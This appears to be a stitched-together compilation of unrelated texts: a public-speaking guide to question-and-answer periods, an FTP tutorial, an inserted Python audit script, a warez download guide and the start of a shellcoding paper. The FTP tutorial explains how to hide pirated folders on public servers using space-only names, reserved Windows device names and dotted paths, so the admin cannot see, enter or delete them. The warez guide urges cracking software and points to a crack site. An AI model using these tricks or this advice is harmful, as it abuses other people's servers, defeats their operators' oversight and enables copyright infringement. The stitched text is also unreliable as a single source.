Handling Question Answer Periods

Next to the invitation itself, the offhanded comment, “Oh, by the way, you should allow a little time at the end for questions,” is the greatest cause for concern for many speakers. Why? Several reasons: They fear not knowing the answer to a specific question. They fear that someone will question their authority or the credibility of their information. They fear stammering and faltering with unplanned answers. They fear a hostile audience or participant. They fear losing control of the audience and the situation. They may even feel “put upon” for being placed on the spot with an unpopular answer or an unpopular subject.

And any or all of these may cause embarrassment.

Why, then, should speakers put themselves through the anxiety of anticipating these predicaments and devastating results? First of all, the audience expects time for questions—as their God-given right to force the speaker to “meet the press” so to speak, particularly on controversial points.

But in addition to audience expectations and needs, questions also benefit you, the speaker. First, questions allow you to apply the key points specifically to your audience’s situation. Audience analysis, of course, is part of your preparation, but questions give you one last opportunity to make specific application. Questions also provide feedback on how clear you were and offer a chance to correct wrong impressions. When you get an off-the-wall question, you immediately recognize that one of your key points has been perhaps misleading for or misunderstood by your listener.

Another advantage of question-answer periods is to establish further rapport with your audience. Your answers show that you care about individual needs and understanding. They show genuine goodwill in giving value to your audience. Here’s your opportunity to be spontaneous and witty. And nothing shows your depth of knowledge, credibility, and communication skills as vividly as unrehearsed fielding of unplanned questions.

Finally, questioning periods give you “leeway” in judging the appropriate timing. Five or ten minutes either added or subtracted from your speech can be corrected in the time allotted for questions—a reassuring cushion for you, particularly on a first-time speech run.

Let’s get into the mechanics, then, of handling question-answer periods effectively.

Anticipate and Prepare for Questions

Audience analysis, the first step in preparing a speech, should always include consideration of questions the group will have about your information and opposing viewpoints. Plan for these questions specifically in your question-answer period and prepare succinct responses.

Here’s an acronym we use to coach students in formulating a strong, memorable, spur-of-the-moment answer:
S = Summary (One-sentence summary statement of your answer)
E = Evidence (Key points to support your answer)
E = Example (Specific illustration that will make the key points memorable)
R = Restatement (Restatement of summary)

Question: “Do you think leasing space in this building will solve our overcrowding problem permanently?”
Answer:

(S) “No, I can’t see leasing more space here as a permanent solution.

(E) “The extra space available is not suitable for the kinds of shelving we want to install. For another thing, the extra space does not open to the outside corridor, and therefore, the traffic to the registration desk will still create the main peak-hour waiting lines. And neither will the extra leasing space accommodate the additional 200 or so visitors we plan to have during the spring.

(E) “If you’ll remember, two years ago we tried—with no success—to alter the traffic pattern by leasing more space on the bottom floor. People just would not walk to the end of the hall to take the alternate route. You remember Frank Tanner’s comments about his people not even having time to reach the coffee machine in 15 minutes, much less get a cup of coffee.

(R) “So, no, I don’t consider leasing more space in this building as a permanent solution to the overcrowding problem.”

With this format, you should find it much easier to be a SEER and to think on your feet. The idea is to have a thinking format to gather and present your ideas in a concise way for maximum impact and recall.
One last tip: You may want to avoid a particular issue in your prepared remarks on the lucky chance that the matter won’t surface in the question-answer period. But don’t count on it. Be prepared with an answer or at least an acknowledgment of any opposing viewpoint.

Encourage Questions When They are Slow to Come

Don’t assume that if the group voices no questions there are none. Audience members hold their tongues for any number of reasons: They haven’t shifted gears yet to active participation. They think that a question is stupid and that they should have understood your information the first time around. They may also think their question and your answer would be of limited interest and, therefore, hate to monopolize others’ time for their own clarification. They may feel particularly inept at wording their question. They may not want to risk others’ hostility with a controversial viewpoint or question. They may have understood your speech so thoroughly that they have no questions.

And your greatest three worries: They may not have understood your talk well enough to ask a question! They may have no interest at all in your subject! Or they may have written you off for credibility reasons.
To encourage questions, make sure your body language shows openness to the audience—upturned palms, wide-open arms, alert posture, raised eyebrows, a smile, movement toward the audience. All these gestures and movements show that you welcome their interaction.

Extend an invitation to questions with comments such as: “What questions do you have?” rather than “Do you have questions?” The least effective invitation is to mumble, “Are there questions?” as you glance up briefly, leaf through your notes again, or leave the stage.

Affirmations from you after questions (“Excellent question,” “Thank you for asking that,” “I’m glad someone brought that up because…”) also encourage other listeners to take a risk with their own questions.
If you anticipate difficulty in generating questions, you can distribute index cards at the beginning or end of the speech, asking participants to jot their questions down and pass them to the front. That way, you can weed through the cards, selecting the best ones. This procedure gives you maximum control and flexibility while still being responsive to the audience.

You can also generate questions with an opinion poll: “How many of you think that it would be feasible to raise this amount of money in six months’ time? In a year?” They raise their hands after each. “Lisa, you responded on six months. What gives you that confidence?” Such probing relaxes the group, encourages openness, and starts momentum for expressing opinions.

Pose your own question: “A question many groups frequently ask and one that may also be of interest to you is….” Or: “A question Bill Maxwell raised at our last meeting may still warrant discussion. He wanted to know if….” Or: “An issue I didn’t get into in my earlier remarks is Z—do any of you have a particular concern about how…?”
Or you may want to repeat questions or comments overheard at the beginning: “I overheard someone earlier express the idea that…. How many of you agree?” This help on your part gives audiences time to consider their own questions and shows that you’re taking their questions seriously.

Maybe most important of all: When you do receive a question, be brief in your answer. If you take ten minutes to answer the first one or two, some participants will fear antagonizing less interested audience members by asking another question that may lengthen your speech another half hour.

Determine Whether to Repeat or Not Repeat the Question

If the sound is so poor in the room that questions from the audience can’t be heard, certainly you should repeat them for all to hear. You may want to repeat some questions, if not all, simply to give yourself time to think.
But to repeat a question in a small-group setting where everyone obviously heard is redundant and makes you sound like a parrot.

And you never want to repeat hostile questions because it’s difficult to do so without sounding hostile or defensive yourself. The other danger is that you reinforce the negative thought or the opposing viewpoint in your audience’s mind.

Maintain Control of the Audience

Set boundaries at the beginning of the session as to what kinds of questions you will take, the number of questions you have time for, and who will respond to each.

“I’ll ask you not to bring up the issues of X and Y for security reasons.” “We won’t let ourselves get into the Z matter because of the current litigation.” “I prefer to deal with questions only in the area of A and B rather than C, which headquarters can more appropriately deal with.” All these comments at the beginning set the stage for your control of what is to follow.

Then when someone asks an irrelevant question, you can defer the answer to a private dialogue afterward and not waste the group’s time or seem unresponsive to their needs. You will also limit the occasion for questions unrelated to your topic or expertise.

And no one says that you must answer all the questions. If you consider a question out-of-line, confidential, personal, irrelevant, or of little interest to the rest of the group, you can always deflect it, reroute it, challenge it, or simply defer answering it. “I’m afraid that’s out of my area of expertise; would someone else like to respond?” “Jack, I’m curious about why you’re asking that question; didn’t you and Mark work those issues out earlier?” “Do we really need to answer that question, or would it be more advantageous to focus on…?”

Finally, take questions in turn and don’t let a few monopolize: “I regret that we’ll not have time to finish with all the questions from those of you who are so perceptive with additional thoughts. But we do need to wrap this up. I’ll be around here for a few minutes if any of you would like to follow up one on one.”

Listen to the Question

Listening to the questions may not be as easy as it sounds. If you’re nervous, if you’re lambasting yourself about a previous error, if you’re worrying about the time, or if you’re threatened by the hostile body language of someone in the room, it’s easy to miss the point of what the questioner is asking. Poor listening may cause you to fumble a question you could have easily fielded.

Compounding the matter is the fact that the asker may give too much background or irrelevant information before getting to the real point. And the asker may not have a clear understanding of what his or her real question is!
To avoid giving an off-base answer, clarify with a probing question of your own: “Let me see if I understand your question correctly. You want to know if…?” Or: “Is your question thus-and-so? Or are you really asking if it is possible to…?”

Give your best effort to understanding the true question rather than concentrating on preparing your reply to contradict or refute the asker’s viewpoint. Finally, show that you are listening with attentive body language, such as leaning forward, head tilted in reflection, and steady eye contact.

Think Before You Answer

Even when an answer pops quickly to mind, pause before rushing ahead. With frequently asked questions, it’s tempting to give the canned answer when, with a little forethought, you can customize your answer, making it even more responsive to the asker.

To allow even more thinking time, you can use props such as removing or replacing eyeglasses, taking a sip of water, striding to another spot in the room before turning to face the group, or tilting your head and rubbing your chin as if reflecting on the brilliance of the question.

You can also buy thinking time by commenting on the question itself: “That’s a tough question.” “That’s a perceptive question.” “I anticipated someone asking that and I don’t know if I’m going to have an answer that you’ll agree with or find completely satisfying, but….”

You may say honestly: “Let me think about that a moment” and then repeat the question to yourself aloud, “Ummm, what would I recommend if….” Such a pause and repetition renews the audience’s attention as they anticipate why the question required serious reflection.

You may refuse to answer at all: “I’m not at liberty to answer that now.” “That piece of the puzzle is still in the works now. May I get back to you on that later?”

Overview Your Answer Briefly, Then Elaborate

The question-answer period is not the place to redo your speech. When asked a question, respond with a headline message, then elaborate very briefly. Your audience will understand the elaboration much better within the context of your overview answer.

Here are a couple of examples of this technique: “In a word, my answer is yes. Management is aware of the problem and we’re trying to correct it. Last week, for example….” Another example of overviewing and then elaborating: “I don’t think it’s too expensive, no. It costs less than X and Y. Here’s how I think we can finance the first phase….”

Direct the Answers to the Entire Audience

Begin your answer while maintaining eye contact with the asker, and then after a few seconds glance away and sweep the entire group. Direct the remainder of your answer to everyone and make your comments generic enough for their interests also.

Remember that you do not have to satisfy every questioner completely because some will never stop their follow-up questions. Others may persist in presenting their own viewpoints even after you’ve given your answer. Keep in mind that you don’t have to answer every question fully. Just make your point briefly, break eye contact with the asker, then turn to the entire group and ask for the next question.

Use Your Answers to Reinforce Your Points

“I’m glad you brought that issue up because it will give me opportunity to elaborate on…” realigns the question with one you really want or need to answer. You can also refocus the question to make it bigger or smaller: “The larger issue that most of the industry will be concerned with is…; therefore, let me put my answer in a larger context.” Or: “Yes, that is the big-picture problem, but let me bring it a little closer to home with the more direct issue of….”

Go in either direction with the question to reinforce what you think is the essential viewpoint or message of interest.

Polish Your Techniques for Handling “Problem” Questions

Show-Off Questions

These are the questions asked merely to show the asker’s own knowledge of the subject or accomplishments. Recognize the reason behind the question, then comment only briefly and go to the next question. If this kind of questioner persists, you may have to add a comment such as the following to keep him or her from monopolizing the situation: “I’m not sure I’m understanding your question in all this. Would you please ask the specific question again.”

The asker will generally fumble into focusing on a question that you can answer briefly and use to regain control.

Off-the-Subject Questions

If the question is completely off the wall, you may simply gaze at the asker momentarily and then move on without a response at all—as if you didn’t quite understand the point.
You may ask if someone else has a similar concern. If so, answer briefly. If not, ask for permission to hold the question until the end, “if there’s time.”

Or you may comment: “Interesting idea, but how does that relate to Y?” The asker will usually mumble that it doesn’t and acquiesce or ask a more relevant question.

“That’s interesting and something worth further thought, but right now I’d like to spend our time focusing on….” will usually put the matter to rest. Or: “I hadn’t expected a question of that nature. May we discuss that later—just you and I?” The asker will usually be reinforced by the personal attention offered and you won’t lose the rest of the audience.

Limited-Interest Questions

When possible, bridge from the limited perspective to the larger issue at hand: “With reference to your specific situation, my opinion is that…, but the larger issue here seems to be….” Continue by making application to the entire audience.

Ask: “Does anyone else here have that concern?” Pause and look around, then continue: “Well, let me give you a brief answer and let’s talk about that later one on one—will that be more helpful?”
Then break eye contact and move on.

“Dumb” Questions

Don’t chance cutting someone off with what sounds like a “dumb” question but may be a very intelligent one after all. Rather, the “dumb” question may be a result of advanced, complex thinking that may not have occurred to you. The question may be quite relevant and you simply don’t understand the relevance because of limited expertise. Probe further to make sure you understand completely: “I’m afraid I’m not following the question. Would you explain further exactly how X relates to Y?”

Rambling or Long-Winded Questions

You may interrupt with, “Excuse me, but do I understand your central question to be…?” Or: “Excuse me, but I think I now have the drift of your question. My response is simply that….”

Unintelligible Questions

If you cannot understand the question because the asker has a heavy dialect or is fuzzy in his wording, pick one phrase or part of the question to deal with and frame a question that you think he or she may be asking.

Multiple Questions

In response to long, complex questions with irrelevant information thrown into the pot, you may have difficulty remembering everything that was asked along the way. When that’s the case, either answer the questions you remember, answer the last one, answer the most important one, or ask the questioner to repeat them slowly while you write them down. Then respond one by one.

You can defer some of them with: “If I understand completely, you’ve asked me four good questions. Let me answer the first two and come back to the others later if there’s time.”

Hypothetical Questions

Be careful that you don’t get trapped here. Express your disagreement with assumptions and say so when you think such a situation is highly unlikely. End with: “I prefer to concern myself with the real here-and-now in formulating policy on this issue. For the present situation, I still consider….”

Or refocus with: “James, we have so many real-life situations at hand that I’d rather stick with those concrete facts, if you don’t mind.” Or: “There are so many unknowns and variables in hypothetical questions that it would be difficult to give a meaningful answer to that concern. In the case of Z, is your interest more about…?”

Forced “Yes or No,” “A or B” Questions

If you can answer with a simple yes or no, do so. But if you prefer not to see the matter in black or white, say so: “I think we have to be careful here not to back ourselves into a corner with either answer. Either simple answer can keep us from seeing the extenuating circumstances that might alter….” Or: “I don’t think a simple yes or no would do justice to the issue.” Or: “I think we’d make a mistake to put it in either-or terms. There are so many issues that can affect….”

Finally, you can expand your options: “I think we have more than those two alternatives. Rather than A or B, a third possibility is to….”

Questions You Don’t Know the Answers to

You may defer the question to someone in the room with more expertise in that area: “I’m not sure I can adequately elaborate on that. Jeff, will you offer your expertise here?” You will win respect for your honesty and the support of the more experienced person you deferred the question to.
Never be afraid to say simply, “I don’t know. I’ll have to check on that information and get back to you.” And then do so.

Hostile Questions

If you expect hostile questions, you may request that all questioners state their names, companies, and titles before they ask questions. Some will think twice before they blurt out a hostile comment and risk associating it with their company. Anonymity is great protection.

Try to determine the reason for any hostility. By acknowledging and sympathizing with the legitimate feelings of the asker, you may defuse the hostility and help him or her receive your answer in a much less hostile manner.
The questioner’s hostility may be a reflection of his business agenda or his personality and may have little to do with you. Simply let the asker vent his emotions, and then go to the next question after a brief statement of your opinion.

Some questioners use a pseudo-courteous tone to wrap a hostile question. If so, reply just as courteously, but without the sarcasm.

You may even try a little humor or drama before answering, such as throwing your hand across your heart as if you’d been shot. “You may have hit me on that one.” Then proceed to answer as calmly as you can.
For frivolously hostile questions, you can relay the question back to the asker or to another person: “Mr. Jones, I feel uncomfortable in responding to that question. Maybe you’d just like to tell us how you would answer that question were you in my place?”

If you think the hostility is limited to one person’s viewpoint, you can let the group respond on your behalf: “Do any of the rest of you agree with that viewpoint? Does anyone else want to respond?” The silence will be a great answer. Or you may add your own in a courteous way.

Don’t feel that you have to refute the opposing view in great detail, particularly if the hostile view was not well supported itself. Simply comment: “No, I don’t think that’s the case.” No elaboration. Your answer will sound authoritative and final and will put the asker in the position of being rude and argumentative if he/she rephrases and continues.

If you can easily do so, rephrase a legitimate question minus the hostile tone: The question is: “Why are you demanding six years’ funding up front?” Repeat the question aloud: “Why do we think six years’ funding at the outset is necessary? Well, first of all….”

Above all, do not match hostility with hostility; instead, try to remain congenial in your answer. The audience will almost always side with (or at least empathize with and respect) the person who remains the calmest and most courteous.

Remember that the way you answer questions will always be remembered more clearly and for much longer than the content of your answer.

Conclude the Question-Answer Period with a Summary

Don’t let your speech limp to a close after the last question with “Well, if there are no more questions, that’s about all, folks.” Instead, firmly conclude with your prepared closing remarks. Here is where you actually use your prepared closing—that pithy quote or challenging question that will leave your audience charged and ready to act. In fact, some speakers prepare two closings: the one that ends their prepared speech and leads into the question-answer period and then one that wraps up the entire session with high impact.

If you’re lucky, you may happen to get a question that’s a great lead-in to your prepared closing. If so, use it as impetus to your conclusion and you’ll look even more eloquent and in control.

Maybe the very idea of questioning got off to a bad start when we as children were told never to question our parents’ decisions or commands. And schools sometimes reinforce the idea that questions negatively challenge the instructor’s authority. Certainly, we all remember the loudmouthed smart aleck whose every question was a challenge. Or maybe we’ve seen too many LA Law dramas where the judge instructs the witness in a booming tone: “Just answer the question.”

Don’t let those experiences keep you from making your speech all it can be. Allow questions and watch your audience’s mood, interest, and body language switch from low gear to high. Questions clarify, tailor, and reinforce your key message. To your audience, they are your statement of openness, genuineness, courtesy, and goodwill.

A Stop For File Deleters

Introduction

This tutorial should not be used to exploit webservers. Some of the techniques used here have certain outputs that can crash old servers, making them unusable. Throughout this tutorial, techniques will be passed on from exploits found in the ‘Windows’ OS that ‘ACTUALLY’ help in the prevention of deletion. There are lots of methods of stopping a deleter without ANY restrictions set on the server, but most have some weak point. I came across four new techniques: making a folder ‘invisible’ or undetectable from an FTP client LIST function; making folders/directories inaccessible; clone prevention, creating smart directories which slow down the user’s attempt; and ‘undeletable files’. I’m sure most users would thank me for this after experiencing rock solid protection and safe files.

Invisible Directories

The idea of invisible directories came about when I came across paths that were “/ /example/” and were not listed in the main folder but were still ‘accessible’. These can be created in all directories without other users knowing they exist unless they are searched for ‘MANUALLY’, which at present takes ages, searching through each folder for “/ /”.

Creating Invisible Directories

1. before
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

2. after
./ /~/temp/tagged/for/team/warezpiratez/fxp/ <- hidden folder
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

To create the hidden folders, make a new dir. as follows, using this method: [backslash][space][backslash][foldername1][backslash][foldername2].

ie. / /foldername1/foldername2/...

The 'space' isn't a name but a 'character' that does not get listed, therefore making the directories impossible to view.

NOTE: Making the hidden folders several LAYERS/SUB-DIRECTORIES deep is recommended.

ie. / / / /~/temp/tagged/for/ /team/warez/ /piratez/fxp/

This technique is not ‘anti-deletion proof’ but hidden-from-deletion proof! Read on to find out how to combine ALL THREE TECHNIQUES to make it ‘REMOTELY’ impossible to delete. Please note the ‘quotes’: REMOTELY in the sense of remote/local host.

Inaccessible Directories

Inaccessible directories prevent the user from ‘entering’ the folder. The user will not be able to enter the folders without knowing the ‘entire’ remote path.

Creating Inaccessible Directories

1. before
./temp/tagged/for/team/warezpiratez/fxp/
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

2. after
./COM1 / temp/tagged/for/team/warezpiratez/fxp/ <- inaccessible directories, due to 'COM1' former Windows bug.
./pub/
./images/
./_vti_pvt/
./_vti_cnf/
./_vti_log/
./temp/

To create inaccessible folders, use the following list of 'UNUSABLE NAMES':

COM1 COM2 COM3 COM4 (Windows COM PORTS)
LPT1 LPT2 LPT3 LPT4 (Windows Printer Ports)
AUX
NUL

Make a new folder "COM1[space][backslash][space][backslash]", i.e. /COM1 / /

NOTE: This makes the folder inaccessible, even to the siteadmin (unless accessed from DOS, locally, with access to the machine).

To use the dir., create a new folder called “COM1[space][backslash][space][foldername1][backslash][foldername2]”, i.e. /COM1 / / ~/temp/tagged/

NOTE: This folder is still inaccessible if a user attempts to enter it. To gain access to the folder, the ‘full path’ must be known. To enter the folder, use the RAW command ‘CWD’ (change dir.) with the path, i.e. CWD /COM1 / / ~/temp/tagged/, and voila, the folder is usable and working.

TIP: Create the folder ‘several’ LAYERS/SUB-DIRECTORIES deep, and it is impossible to enter.

Smart Directories

This technique involves the creation of directories that are ‘COPYRIGHT’. How’s that for a simple description. The idea is to create directories that contain [periods] throughout each of the subdirectories or segments. The use of this is quite simple; note the word ‘COPYRIGHT’. Most users use the ftp://login:password@ip:port/path/ format for faster access to an FTP.

Creating Smart Directories

To create ‘smart’ directories, make the folder names of each subdirectory contain a period before, inside, and after words within the subdirectories, creating a fake ‘file’ recognition. Windows-based clients will assume the folders to be files, with Windows using its 8.3 format for file names.

1. before
ftp://anonymous@anonymous@123.456.789:21/temp/tagged/for/team/warezpiratez/fxp/

2. after
ftp://anonymous@anonymous@123.456.789:21/temp/tagged ./for . /team. /. warez .piratez/fxp

NOTE: Be as creative as possible with the dot formation, to prevent COPYING of all folders through each directory. The idea is to make the directories act as file extensions; therefore, when copied, they will be ‘queued’ and the user has to enter the directories MANUALLY. Other ‘SYMBOLS’ can be used, NOT ONLY periods. But I find this most common, if the creator intends to create a catch phrase ‘memorable’ to him alone.

QUEUE: 1. /temp/tagged ./for . /team. /. warez .piratez/fxp <- result of folder extensions

Undeletable Files

Sad that we had to resort to this, but this might be the end of deletion as we speak. I find no other method out there that can accomplish this task except setting restrictions from the server. This method involves the file being self-protected, meaning the files are ‘accessible’/‘downloadable’ but can NOT be deleted. The idea is to make the file corrupted/crash, making it ‘in use’.

Creating Undeletable Files

To create a self-protected file, rename the entire file including the extensions to the following format:

filename[space][period]/[space]/ i.e. filename ./ /

The / / in the name, as shown above in the previous example of creating invisible directories, makes the .extension impossible to view on the pub as a Windows-recognized mime but, once downloaded, it will be shown and accessible. How’s that for wits.

1. before
warezpiratez.rar <- rar mime, winrar.

2. renaming
warezpiratez ./ /

3. results
-warezpiratez <- unknown file (undeletable, downloadable) <- file will take the correct mime format on localhost

Ultimate Protection

The ultimate protection is obviously yourself and your wits against the deleters. Use private FTPs, get fast sites T1+, but in this case, it would be the combination of all four techniques, using them in one major and thought-out plan.

Creating The Ultimate Protection

To create the ultimate protection that is desirable, first of all, create the invisible folders as shown above, several sub-dirs deep. Then create an ‘inaccessible’ folder within those invisible folders. The next step is to create those smart directories so it slows down ANY attempt to gain full access, and it also makes the user run into inaccessible folders. The idea is to trap the user before those folders using the smart directories idea. I didn’t think that was ingenious, but just common sense, and it seemed smart!

1. before
/temp/tagged/for/team/warezpiratez/fxp/ <- no protection

2. after
/ / /./ ./COM1 / temp/tagged ./for . /team. /. warez .piratez/fxp <- protection(still weak)

NOTE: You can be creative with this technique and make it more complex. I didn’t do it in this tutorial because then that would just make you confused. I hope this helps, and please understand: it is not hard, unless you didn’t read from the Introduction. I made this well detailed, for it to be as simple as possible.
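For an administrator auditing an FTP root, the naming tricks described in the sections above (whitespace-only names, reserved device names with trailing spaces, trailing dots) can be flagged mechanically. The following Python is an added example, not part of the original tutorial; the function names and the sample listing are constructed for illustration, and the reserved-name set goes beyond the page's list by including CON, PRN and COM/LPT 5-9.

```python
import os

# DOS device names that Windows reserves in every directory. The tutorial
# lists COM1-COM4, LPT1-LPT4, AUX and NUL; CON, PRN and ports 5-9 are
# reserved as well.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})


def check_component(name):
    """Return the reasons one path component looks like a hiding trick."""
    if name in (".", ".."):
        return []
    if name.strip(" .") == "":
        # e.g. " " -- the 'invisible' directory that a LIST output hides
        return ["only spaces/dots"]
    reasons = []
    if name[0] == " ":
        reasons.append("leading space")
    if name[-1] in " .":
        # Win32 strips trailing spaces and dots, so Explorer and most
        # tools cannot open or delete an entry named like this.
        reasons.append("trailing space or dot")
    # Windows matches device names on the part before the first dot,
    # ignoring trailing spaces ("COM1 " and "NUL.txt" both match).
    stem = name.split(".", 1)[0].rstrip(" ").upper()
    if stem in RESERVED:
        reasons.append("reserved device name")
    return reasons


def audit_path(path):
    """Split a listing path on / or \\ and return (component, reason) pairs."""
    findings = []
    for comp in path.replace("\\", "/").split("/"):
        if comp == "":
            continue
        for reason in check_component(comp):
            findings.append((comp, reason))
    return findings


def scan_tree(root):
    """Walk a local FTP root; return {relative_path: reasons} for flagged entries."""
    root = os.path.abspath(root)
    # On Windows the \\?\ prefix turns off Win32 name normalization, which
    # is what lets the walk descend into names such as "COM1 " or " ".
    walk_root = "\\\\?\\" + root if os.name == "nt" else root
    flagged = {}
    for dirpath, dirnames, filenames in os.walk(walk_root):
        for name in dirnames + filenames:
            reasons = check_component(name)
            if reasons:
                full = os.path.join(dirpath, name)
                flagged[os.path.relpath(full, walk_root)] = reasons
    return flagged


# Constructed sample listing, modelled on the patterns the tutorial shows.
SAMPLE_LISTING = [
    "./pub/",
    "./_vti_pvt/",
    "./ /~/temp/incoming/",
    "./COM1 / temp/incoming/",
    "/temp/incoming ./for . /team. /",
]

if __name__ == "__main__":
    for entry in SAMPLE_LISTING:
        for comp, reason in audit_path(entry):
            print(f"{entry!r}: component {comp!r}: {reason}")
```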

FAQ

1. What is a SUB-DIRECTORY
- It is the folder that is second/inside another folder, i.e. firstfolder/subdir/

2. What is a pub
- Short for public FTP. There are no restrictions/protection on the access over files. Some have them in most cases, but then uploads/downloads are denied. Some would not allow FXP.

3. What does all this mean?
- It makes the internet safer from all the deleters.

4. Who are deleters?
- Deleters are mean and NASTY people who delete files. They include spammers too.

Download Files Using Archives And Images

0x01.0 - the start

So, you’ve just got a brand new internet connection thingy installed and it can handle up to 1 meg/sec download. But of course, there’s no good PC without good software, and, you know, good software is very expensive. Then, on a beautiful Sunday morning, you see something called Warez. Behold our kingdom, and you start drooling a bit until your mom comes raging into your room asking you to put the garbage out. After helping your mom out, the PC and fast internet connection are all yours. And so is the free software.

0x02.0 - packaged files.

As you might know, these software packages are sometimes pretty big in size. To try and reduce the big-file downloads, the releasers of the package will often use some techniques to reduce the load: techniques such as compressing, archiving and splitting. Read on if you don’t understand these words.

0x02.1 - formats & tools.

If you’ve been around more than 1 year on the net, you probably already know all this, but for the new people I added this anyway. The basic use of your Windows Operating System is the use of many different files and file-types. One of the most used file-types on the net is ZIP. File-types are also called ‘formats’.

An overview:

ZIP : A zipped file is a file that’s been archived and compressed.
RAR : RAR files are commonly used for archiving files, which is putting a large number of files in one file. Compressing is optional. File-splitting is optional.
ACE : About the same as a RAR file, just another format and another application.

I explain this to you because these file-types and corresponding programs are often (you can even say always) used when you want to download Warez. The programs you download are almost always archived, compressed or bundled in one of the above formats. Keep reading if you didn’t know this.

OK, so now we know the formats of the files we’re going to deal with; now the programs. As you have probably figured out already, these files aren’t created by Windows or by hand. They’re made using specially designed applications. I’ll show you what applications you can use.

WinRAR : My personal favorite. Handles all of the above stated formats and a lot, a lot more. If you ask for my opinion, I think this is the only program you’ll ever need.

WinZIP : This is a specially designed application for handling ZIPPED files. If you like this one, take it.

WinACE : Another multi-file handling tool. Personal opinion: good for splitting files, way too big for every-day use for decompression.

I’d say: make your choice. I recommend WinRAR because of its simplicity and effectiveness. But hey, I’m not forcing you. Just read some info on the sites and make your choice.

Oh yeah, one last thing: you’ll notice these are all Evaluation versions. I suggest you crack them. Look for a good crack for the right version on: www.cracks.am.

0x02.2 - multi-part archives.

These files are archived in multiple parts (with one of the applications mentioned above), which means the software was zipped or rarred and divided into files of a smaller size than the whole thing together. How do you handle this?

Download all the files to one directory.

Check if all files are there. You can do this by looking at the extensions: *.00, *.01, … If one’s missing, download the missing file again (there are more sophisticated ways to do this, but this is the simplest).

Check if the files are about the same size. For example: the *.04 file must be the same size as the *.05 file, unless the 5th file is the last one.

If there’s a file with the extension *.RAR, double-click it and you can start unpacking the stuff.

If there’s no *.RAR, but an *.ACE, do the same; it’s just another format.

Once you have unarchived the package, you should have a directory full of files from an installation or program. But it’s also possible there are, with the archived files, some other things:

  • If the software pack is a Warez Group (MYTH, CLASS, Fairlight (FLT), …) release, check if there’s an EXE file with the package called Install.exe. If it’s there, you can use that to unpack the files.
  • If there’s no exe in the package, the files are probably just ready to be copied to your directory of choice or ready to be installed.

IMPORTANT : please don’t forget to read the NFO file. It’s very important. It usually contains all further information needed for you to successfully install the software. You can open it with NFO-file viewers or in Notepad (set font to: terminal, 6 or 9 pts).

Normally, you’re all done now and ready to start using the software.

Ok, do I hear protest? Yes I do. It goes: “Hell, I downloaded a multi-part package but it has NO RAR OR ACE OR ZIP OR ANYTHING!!!! Just files with extensions called *.001; *.002, …”

You’re right. Although the situation is quite different from the situation above, it’s really not so different when you look closer. Those files are just unarchived the same way:

  • Select the first file (*.001).
  • Right-click it and select ‘Extract here…’

Watch the progress bar go! You see, it’s just the same method. You might notice there are only 2 or 3 files decompressed: ISO or CUE and BIN files. That’s fairly normal. We’ll talk about handling them in topic 0x03.0.

0x02.3 - one-file downloads.

OK, so the stuff you downloaded was none of the above. Conclusion: you downloaded one big file. This happens quite often when you download things from fast-working FTPs.

What you need to do now:

  • If the file is archived (.rar, .ace, .zip, …), just unarchive it.
  • If the file you unarchived is some weird *.ISO or *.CUE file, go to 0x03.0.
  • If not, just continue the procedure as stated in 0x02.2.

0x03.0 - a clear view on images.

So when you’re reading this, you probably have some files called *.ISO or *.CUE. Of course you want to install the software as fast as possible. But there’s a little problem here. Those extensions… What the hell are they? Alienized files? No. Secret CIA files? Nope. You can stop guessing. I’ll tell you: those files are image files.

0x03.1 - what are images?

Image files are big files filled with data. Yeah, you can say it’s a sort of archived file. But there’s something special about them: they are meant to be written on a disc. They were made by special programs so they could be used to write on a CD-R with a writer and specially designed software.

0x03.2 - ISO files.

ISO is the most used image format on the net. It has become a standard for any commercial CD-writing software to support image-writing capabilities, more specifically ISO images.

Conclusion: ISO is just an extension for a specific type of image file. But how do you install your software? You have 2 ways of dealing with this:

1) Use the file for what it was created: writing it to a CD-R.
2) Extracting the contents of an ISO to a certain directory.

First: how to write them to a CD-R…

  • Download some CD-R writing software (if you don’t have it already).
  • Install and crack it.

I recommend Nero Burning Rom. You can download it from WareZone in the Apps section.

  • Go buy some CD-Rs.
  • Fire up Nero and you can start burning. I’m not going to explain to you how to use Nero. Read the help file about image writing and you should be fine. You can also use the wizard, which is loaded automatically when you boot Nero.

Second: what to do if you don’t have a CD-writer.

  • Download some image handling software.

I recommend WinISO.

  • Fire up WinISO, load your image file and extract it. Again, I won’t explain how to use WinISO. Check for help files or tutorials on the net; they should give you all the answers you need.

0x03.3 - CUE & BIN files.

CUE and BIN files always come together. The BIN file is comparable with an ISO and the CUE file is just a check, but it is required for any program to write this file correctly. Sometimes there’s an SFV file included. Again, this is just a check-up on the file integrity. You can burn and extract these files the same way I explained in 0x03.2.

0x04.0 - CD Emulation.

OK, so here’s another way to handle ISO images if you don’t have a CD-writer. You can create a virtual CD drive. What’s that? That’s something you’ll see as a new disk drive in your Windows Explorer. This disk drive represents the contents you would see if you burned the ISO image to CD!

How to create a virtual CD drive? Download DaemonTools!

Additional help on www.daemon-tools.com

Advanced ShellCoding Techniques

Introduction

This paper assumes a working knowledge of basic shellcoding techniques and x86 assembly; I will not rehash these in this paper. I hope to teach you some of the lesser-known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and its purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First, some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand; the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax   # implicit operand: %eax = 10
movl $0x0a,%ecx   # mul accepts only a register or memory operand, so 10 goes in %ecx
mul %ecx          # EDX:EAX = %eax * %ecx

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register (this is also how floating points are stored in some cases, as an interesting sidenote).

